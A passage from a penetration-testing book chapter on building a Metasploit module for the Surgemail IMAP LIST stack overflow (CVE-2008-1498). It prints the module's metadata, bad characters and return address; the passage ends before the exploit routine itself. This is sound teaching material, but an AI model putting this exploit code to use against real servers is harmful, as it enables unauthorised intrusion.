212
Chapter 14
Determining the remaining bad characters is an exercise left for the
reader. An excellent, albeit tedious, way to eliminate all bad characters is
to follow the technique described at
http://en.wikibooks.org/wiki/Metasploit/
WritingWindowsExploit#Dealing_with_badchars
.
The current exploit code, including all of the pieces we’ve added, is
shown here:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Surgemail IMAP Server
version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
account credentials are required.
},
'Author' => [ 'ryujin' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'BID', '28260' ],
[ 'CVE', '2008-1498' ],
[ 'URL', 'http://www.exploit-db.com/exploits/5259' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 10351,
'DisableNops' => true,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => "\x7e\x51\x78" } ], # p/p/r in surgemail.exe
],
'DisclosureDate' => 'March 13 2008',
'DefaultTarget' => 0))
end